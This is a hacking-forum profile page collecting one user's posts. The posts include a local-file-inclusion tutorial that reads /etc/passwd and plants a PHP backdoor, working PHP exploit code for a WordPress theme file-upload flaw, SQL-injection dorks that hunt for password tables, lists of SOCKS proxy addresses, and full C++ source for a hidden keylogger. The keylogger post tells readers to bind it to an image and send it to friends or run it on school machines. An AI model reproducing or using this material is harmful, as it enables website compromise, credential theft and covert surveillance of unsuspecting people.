Jump to content

Welcome to LeVeL23HackTools

Welcome to LeVeL23HackTools, like most online communities you must register to view or post in our community, but don't worry this is a simple free process that requires minimal information for you to signup. Be apart of LeVeL23HackTools by signing in or creating an account.

  • Start new topics and reply to others
  • Subscribe to topics and forums to get email updates
  • Get your own profile page and make new friends
  • Send personal messages to other members.

  • Announcements

    • dEEpEst

      RESTRICTIONS ON DOWNLOADS   10/17/2018

      You can download 5 files a day, if you want to make unlimited downloads you must buy PRIV8, you will have access to all the parts of the forum and you will be able to download unlimitedly without restrictions for a lifetime.

hack3core

LvL-23
  • Content count

    38
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

Community Reputation

41 Excellent

About hack3core

  • Rank
    Leech
  • Birthday 04/29/1991
  1. Pro Hacking Crypter V 2.5 By Mя.Dzk!LLeя 4 Stub

    Re: Pro Hacking Crypter V 2.5 By Mя.Dzk!LLeя 4 Stub Thanks for the video
  2. Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised. We have already written an article on Directory transversal attack. Therefore I believe that we need no to go in details about the attack. You might know avinash by now the author of the previous article How Hackers Are Hacking Into Websites On Shared Hosts. However in this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website. Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks. index.php?homepage= index.php?page= index.php?index2= Requirements: 1) A Vulnerable Website 2) Remote shell ( [Hidden Content] ) 3) User-Agent switcher ( [Hidden Content] ) 4) Mozilla Firefox The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges. Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it. Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above. The hacker edits the useragent and changes code inside to the user agent to the following: Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called) After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function) disable_functions | no value | no value The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command: Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following: Thanks :D
  3. Help me with RAT

    Re: Help me with RAT thanks boy-)
  4. Help me with RAT

    Hi all, a have dynamic ip and closed all ports, how i can use RAT? Thanks
  5. E-Mail Address Grabber Dork and Tool

    Mail Address Dork Username and Password Dork Example URL Mail List I Use Mail Grabber Tool [Hidden Content] Enjoy! :)
  6. Hi again level-23

    I'm glad to see you again-)
  7. Cracking stealers

    hi all i very glad to see you-)) long time dont see-) There are two types of Stealers. 1. ftp Stealers 2. Php Stealers Before Starting you need to clear your cookies & private data for firefox, internet explorer, msn, etc etc.... for protecting your self. After clearing your private data now u need an sniffer. Good if you have Private one but also you can use free or trial versions. If you dont have 1 then Download from here. Code: >[Hidden Content] Ok after installing an sniffer run it & start monitoring your network adapter. After Starting it it will monitor all the incoming & Outgoing traffic. Now Goto your stealer's server & run it, In kaspersky Click on Allow now everytime it ask. 1st stealer read your private data (which u already wiped before starting this) and then send it over internet, kaspersky shows like this. Allow Just 1 time & then goto your sniffer, check at the ports where ftp is shown, the last access to ftp as shown here. Now in the list Double click on one of the outgoing traffic whose destination port is 'ftp'. Now the window appears in front of you is your desired target... Now open ftp client, enter his info username/pass, Fuck his Logs.... :h: The same method apply to php stealer, but cant see its logs, have a look.. Enjoy Cracking Stealers Have Fun
  8. Shocks 5 fresh now

    > 202.112.31.203:1080 71.60.189.228:53838 202.120.7.122:1080 211.86.62.34:1080 202.38.95.66:1080 216.172.83.105:9713 176.36.68.60:20222 112.213.105.31:9999 176.106.252.98:9844 24.94.157.155:2152 180.169.125.49:8888 94.77.199.148:1080 60.29.104.197:1080 89.17.124.171:1080 204.210.211.250:54843 201.245.192.10:1080 196.223.13.230:1080 198.23.164.8:8888 50.121.6.59:10330 124.95.155.52:1080 121.17.125.15:1080 124.95.155.53:1080 122.0.125.148:1080 124.165.241.90:1080 113.106.90.81:1080 113.105.169.224:1080 121.14.36.182:1080 92.51.109.181:1080 124.95.155.27:1080 124.95.155.59:1080 112.95.238.81:1080 121.17.125.16:1080 120.151.111.104:1080 121.52.210.118:1080 193.238.111.26:1080 121.17.125.12:1080 106.3.32.153:1080 157.252.154.93:48047 62.44.12.63:1080 125.209.116.29:1080 119.148.160.243:1080 116.58.10.126:1080 118.103.239.242:1080 216.244.78.227:1080 78.36.14.195:1080 59.151.29.36:1080 5.66.186.185:10971 93.90.102.194:1080 58.249.119.242:1080
  9. Many people ask : how to use exploit CSRF / Remote File upload vulnerability ? I will answer it in this thread.You will find exploit in here : 1337day, exploit-db, packetstorm .. etc (Find it from Google)(HTML VERSION)If you find exploit something like this : >############################## Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability# Author: Bebyyers404# Date: 11/17/2013# Infected Version: v3.x.x# Infected File: upload_handler.php# Category: webapps/php# Google dork: inurl:/wp-content/themes/Amplus_v3###############################POC & EXPLOIT Please choose a file: #File path:[Hidden Content]]###################################################################### How to make it works ?... Copy the exploit : > Please choose a file: NOTE : Change [Hidden Content] with your target (site vuln you got) And change /Amplus_v3.x.x/ with themes version in site victim.Check wordpress path before save.Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc Paste in notepad & Save with HTML extension. and open with firefox / chrome / etc.. you will see form uploader button. now upload your shell/image. & Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.(PHP VERSION)If you find exploit something like this : >################################################################################## Exploit Title: WordPress bordeaux-theme Themes Remote File Upload Vulnerability# Author: iskorpitx# Date: 12/11/2013# Vendor Homepage: [Hidden Content]# Themes Link: [Hidden Content]portfolio/bordeaux/# Infected File: upload-handler.php# Category: webapps# Google dork: "/wp-content/themes/bordeaux-theme/"# Tested on : Windows/Linux################################################################################## Exploit<?php $uploadfile="upload.php"; $ch = curl_init("[Hidden Content]"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS,array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>access shell : [Hidden Content]################################################################################# How to make it works ?...Copy the exploit : ><?php $uploadfile="upload.php"; $ch = curl_init("[Hidden Content]"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS,array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> NOTE : YOU MUST HAVE PHP EXTENSION (ENVIRONMENT VARIABLE) PHP will running in CMD (Windows)Change [Hidden Content] with your target (site vuln you got) Check wordpress path before save.Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc Paste in notepad & Save with PHP extension into folder ex: (exploit.php).Example :I have Exploit folder in C:/ directory. upload.php <-- in script exploit is name your shell, you can rename it anything you like. So i have upload.php and expoit.php already exist in the same folder.I will run this script with this command (CMD) : >C:\Users\Diizzy>cd \ExploitC:\Exploit>php exploit.php And you can access shell in here : [Hidden Content] : >[Hidden Content] Script Will Running With PHP Environment Variable Sorry for my english Correct me if i wrong
  10. Base64 Encrypt-Decrypt Tool By Antopixel

    Re: Base64 Encrypt-Decrypt Tool By Antopixel
  11. Create Proxy Site

    Hello Everyone! Today you will learn how to create your own proxy sites like speedproxy.co.uk , yellowproxy.net and bypassable.com etc etc... Anyway lets start... Requirements: 1-Proxy site script (click here) 2-Free web hosting account. 3-A liitle brain to use it. :P Method: 1-Download the proxy script from the above link. 2-Then upload whole script into your free hosting website via . 3-Then first time when you open your website , it will show you a page like admin.php here you can create your admin account which will use to modify your website whenever you will want to modify it. Live test: (click here)
  12. Private Dorks SQL

    > inurl:group_concat username 0x3a PASSWORD from robot inurl:group_concat username 0x3a PASSWORD from pirates inurl:group_concat username 0x3a PASSWORD from obama inurl:group_concat username 0x3a PASSWORD from shadow inurl:group_concat username 0x3a PASSWORD from khan inurl:group_concat username 0x3a PASSWORD from paul inurl:group_concat username 0x3a PASSWORD from pakistan inurl:group_concat username 0x3a PASSWORD from hacker inurl:group_concat username 0x3a PASSWORD from users inurl:group_concat username 0x3a PASSWORD from adm inurl:group_concat username 0x3a PASSWORD from admin inurl:group_concat username 0x3a PASSWORD from user inurl:concat username 0x3a password from sysibm.sysdummy1 inurl:concat username 0x3a password from israel inurl:concat username 0x3a password from mr.bean inurl:concat username 0x3a password from sysuser inurl:concat username 0x3a password from sysadmin inurl:/MyBB/Upload/inc/ inurl:db_mysql.php inurl:sql.php?table=wp_users inurl:sql.php?table=group inurl:sql.php?table=phpMyAdmin inurl:sql.php?table=users inurl:sql.php?table=login inurl:/phpMyAdmin/sql.php inurl:sql.php?table=customer inurl:sql.php?table=member inurl:sql.php?table=account inurl:sql.php?table=admin inurl:sql.php?table=tblwhoislog inurl:/usr/local/apache/htdocs inurl:sql.php?table=jos_users inurl:sql.php?table=mybb_users inurl:sql.php?table=log inurl:sql.php?table=pass inurl:sql.php?table=information_schema inurl:sql.php?table=proxies_priv inurl:sql.php?table=mysql.user inurl:sql.php?table=collection inurl:sql.php?table=loginlog inurl:sql.php?table=menu inurl:sql.php?table=setting inurl:sql.php?table=phpbb_users inurl:/phpmyadmin/sql.php?db=mysql&sql_query= inurl:union+select+filetype:asp inurl:union+select+filetype:php inurl:union+select+filetype:cfm inurl:union 4.1.22-standard-log inurl:union 5.0.67-log inurl:union» 4.1.22-log inurl:union 5.0.32 inurl:union» 5.0.67 inurl:union» 5.0.51a-3ubuntu5 inurl:union» 5.1.63-cll inurl:bootstrap.php
  13. > 107.2.196.12:33053 107.5.205.39:53490 108.52.84.2:28770 108.8.211.222:29826 108.8.232.127:40947 110.170.190.194:1080 112.78.139.130:1080 114.4.31.90:1080 114.4.44.206:1080 115.124.68.202:1080 118.97.136.166:443 12.197.242.40:44159 124.28.137.254:1080 125.167.180.175:1080 137.30.55.78:54916 139.193.66.215:1080 146.115.61.107:31579 162.243.126.66:1080 162.72.87.152:53009 166.102.16.169:20668 166.161.66.77:2123 173.16.137.93:17551 173.163.56.233:54399 173.195.252.93:41953 173.23.28.47:29961 173.241.68.224:36539 173.59.120.124:45837 173.84.52.241:16501 173.88.253.110:30205 174.101.39.97:27931 174.52.205.106:21632 174.54.25.35:14661 174.57.167.101:27231 174.59.226.249:49115 178.157.41.10:1080 180.241.245.37:1080 180.246.117.75:1080 184.14.58.158:20719 184.79.96.46:24420 184.90.179.167:44119 198.20.182.76:1080 199.191.120.205:45153 202.162.202.220:1080 202.169.236.200:1080 203.161.24.12:1080 203.174.12.52:1080 205.240.35.24:52112 Original source: [Hidden Content] 206.53.87.199:26068 207.172.226.88:47200 207.182.142.244:443 207.183.232.242:52629 207.38.202.143:34769 209.150.57.159:41827 209.249.157.76:21753 209.249.157.85:36207 209.249.180.215:16557 209.249.180.241:31963 216.15.64.232:29351 223.25.242.62:1080 23.31.28.245:27188 24.0.179.134:43465 24.111.236.49:41406 24.112.166.139:39186 24.126.178.229:57255 24.140.177.103:48872 24.148.35.231:49255 24.154.179.191:10035 24.154.99.109:43515 24.179.58.253:47263 24.185.250.38:48325 24.207.137.13:35910 24.228.207.13:51234 24.231.211.22:48931 24.231.237.154:31008 24.242.107.191:32736 24.4.194.190:19052 24.45.89.44:18681 24.59.245.112:32211 24.97.28.59:37309 61.247.45.201:1080 63.231.68.28:18013 63.231.68.30:18013 65.188.183.22:42304 65.191.156.208:53682 65.23.23.2:46318 65.25.11.110:26327 65.37.47.207:48113 66.112.21.213:28116 66.196.206.78:8083 66.30.76.140:17669 66.31.66.82:49510 67.153.80.178:22143 67.174.208.98:20855 67.176.146.71:38624 67.187.233.109:49065 67.215.209.227:16941 67.8.39.177:27946 67.95.114.115:32456 68.104.170.70:33452 68.116.87.172:6897 68.174.154.163:36785 68.188.98.190:52194 68.190.156.239:29074 68.190.177.175:15246 68.35.6.76:32993 68.38.228.111:47815 68.56.221.103:10323 68.62.61.110:32119 69.117.14.110:48915 69.117.159.49:38708 69.166.69.50:25897 69.29.126.116:26974 69.34.58.8:16419 69.73.57.134:31824 69.81.49.153:44299 70.102.41.206:23741 70.94.112.86:42770 71.127.210.212:52014 71.184.245.5:31795 71.188.86.63:36591 71.202.0.220:20868 71.231.1.217:40176 71.233.142.202:50947 71.52.27.75:50214 71.55.194.87:38895 71.60.189.228:44758 71.75.51.82:52113 71.82.64.154:26835 72.193.126.85:23177 72.213.159.100:36364 72.253.174.62:47103 72.70.89.226:47014 74.128.62.147:43556 74.195.32.83:28933 74.64.69.154:21455 75.103.220.176:16390 75.109.154.24:52417 75.115.235.226:41881 75.128.107.117:25221 75.128.223.139:2907 75.129.226.75:24538 75.136.136.196:49286 75.73.75.1:27777 75.75.163.82:5333 76.0.111.169:27007 76.102.89.19:42090 76.111.149.41:25471 76.119.19.249:51015 76.126.93.35:30497 76.18.137.108:31635 76.187.27.187:50832 76.190.189.163:46136 76.97.214.250:54417 77.237.169.1:1080 80.191.228.162:1080 82.99.246.10:1080 85.185.244.101:1080 91.98.117.30:1080 92.50.14.23:1080 96.243.121.211:54682 96.3.157.119:29450 96.33.84.161:40381 96.58.34.113:35014 97.81.17.250:56687 97.94.243.236:39141 98.117.63.101:50906 98.234.34.175:38565 98.242.233.182:45647 98.243.72.114:15770 98.251.46.100:24301 98.252.131.45:4081
  14. create a Spyware Keylogger using C++

    How to create Keylogger using Visual C++? Requirements: Dev C++. Download it from here: [Hidden Content] Knowledge about Visual C++(need, if you are going to develop the code). Install dev C++ in your system and open the dev C++ compiler. Go to File->New->Source File. you can see a blank works space will be there in window. now copy the below keylogger code into the blank work space. >#include using namespace std; #include #include int Save (int key_stroke, char *file); void Stealth(); int main() { Stealth(); char i; while (1) { for(i = 8; i <= 190; i++) { if (GetAsyncKeyState(i) == -32767) Save (i,"LOG.txt"); } } system ("PAUSE"); return 0; } /* *********************************** */ int Save (int key_stroke, char *file) { if ( (key_stroke == 1) || (key_stroke == 2) ) return 0; FILE *OUTPUT_FILE; OUTPUT_FILE = fopen(file, "a+"); cout << key_stroke << endl; if (key_stroke == 8) fprintf(OUTPUT_FILE, "%s", "[bACKSPACE]"); else if (key_stroke == 13) fprintf(OUTPUT_FILE, "%s", "\n"); else if (key_stroke == 32) fprintf(OUTPUT_FILE, "%s", " "); else if (key_stroke == VK_TAB) fprintf(OUTPUT_FILE, "%s", "[TAB]"); else if (key_stroke == VK_SHIFT) fprintf(OUTPUT_FILE, "%s", "[sHIFT]"); else if (key_stroke == VK_CONTROL) fprintf(OUTPUT_FILE, "%s", "[CONTROL]"); else if (key_stroke == VK_ESCAPE) fprintf(OUTPUT_FILE, "%s", "[ESCAPE]"); else if (key_stroke == VK_END) fprintf(OUTPUT_FILE, "%s", "[END]"); else if (key_stroke == VK_HOME) fprintf(OUTPUT_FILE, "%s", "[HOME]"); else if (key_stroke == VK_LEFT) fprintf(OUTPUT_FILE, "%s", "[left]"); else if (key_stroke == VK_UP) fprintf(OUTPUT_FILE, "%s", "[uP]"); else if (key_stroke == VK_RIGHT) fprintf(OUTPUT_FILE, "%s", "[right]"); else if (key_stroke == VK_DOWN) fprintf(OUTPUT_FILE, "%s", "[DOWN]"); else if (key_stroke == 190 || key_stroke == 110) fprintf(OUTPUT_FILE, "%s", "."); else fprintf(OUTPUT_FILE, "%s", &key_stroke); fclose (OUTPUT_FILE); return 0; } /* *********************************** */ void Stealth() { HWND Stealth; AllocConsole(); Stealth = FindWindowA("ConsoleWindowClass", NULL); ShowWindow(Stealth,0); } Compile the Code(Ctrl+F9) Now execute the program by selecting Execute->Run(ctrl+F10) now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file. you can see the log.txt file where you save the file. bind the exe file with image or any files and send it to your friend. (0r) if you have physical access to your college/school system,then copy the exe file in that system and run it.
×